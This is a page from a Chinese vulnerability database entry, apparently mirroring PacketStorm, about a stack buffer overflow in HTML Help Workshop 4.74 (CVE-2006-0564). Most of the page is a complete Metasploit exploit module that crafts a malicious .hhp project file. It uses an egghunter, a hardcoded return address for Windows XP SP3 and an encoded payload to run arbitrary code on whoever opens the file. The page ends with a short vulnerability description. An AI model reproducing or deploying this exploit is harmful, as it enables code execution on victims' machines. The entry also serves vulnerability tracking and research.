		sploit << "[FILES]\r\n"
		sploit << "\r\n"
		sploit << eh_egg

		hhp = sploit

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(hhp)
	end

end
		

- 漏洞信息 (F84552)

HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (PacketStormID:F84552)
2009-12-31 00:00:00
bratax,jduck  metasploit.com
exploit,overflow,arbitrary
CVE-2006-0564
[点击下载]

This Metasploit module exploits a stack overflow in HTML Help Workshop 4.74. By creating a specially crafted hhp file, an attacker may be able to execute arbitrary code.

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking
	
	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Egghunter
        
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit',
			'Description'    => %q{
					This module exploits a stack overflow in HTML Help Workshop 4.74
					By creating a specially crafted hhp file, an an attacker may be able
					to execute arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'bratax', 'jduck' ],
			'Version'        => '$Revision: 7759 $',
			'References'     =>
				[
					[ 'CVE', '2006-0564' ],
					[ 'OSVDB', '22941' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/1470' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/1495' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},					
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0a\x0d\x1a\x2f\x5c",
					'StackAdjustment' => -4800,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Windows XP English SP3', { 'Offset' => 280, 'Ret' => 0x00401F93 } ], # CALL EDI hhw.exe v4.74.8702.0
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Feb 06 2006',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('FILENAME',   [ false, 'The file name.', 'msf.hhp']),
				], self.class)

	end

	def exploit
		
		# use the egghunter!
		eh_stub, eh_egg = generate_egghunter
		
		off = target['Offset']
		idxf = ""
		idxf << make_nops(off - eh_stub.length)
		idxf << eh_stub
		idxf << [target.ret].pack('V')
		
		sploit = "[OPTIONS]\r\n"
		sploit << "Contents file="
		sploit << idxf
		sploit << "\r\n"
		sploit << "\r\n"
		sploit << "[FILES]\r\n"
		sploit << "\r\n"
		sploit << eh_egg * 2
		sploit << payload.encoded
		
		hhp = sploit

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(hhp)
	end

end
    

- 漏洞信息

22941
Microsoft HTML Help Workshop .hhp Parsing Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A local overflow exists in HTML Help Workshop. HTML Help Workshop fails to check an unspecified buffer when reading .hhp files resulting in a buffer overflow. With a specially crafted file, an attacker can cause code execution by the individual opening the .hhp file resulting in a loss of integrity.

- 时间线

2006-02-06 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站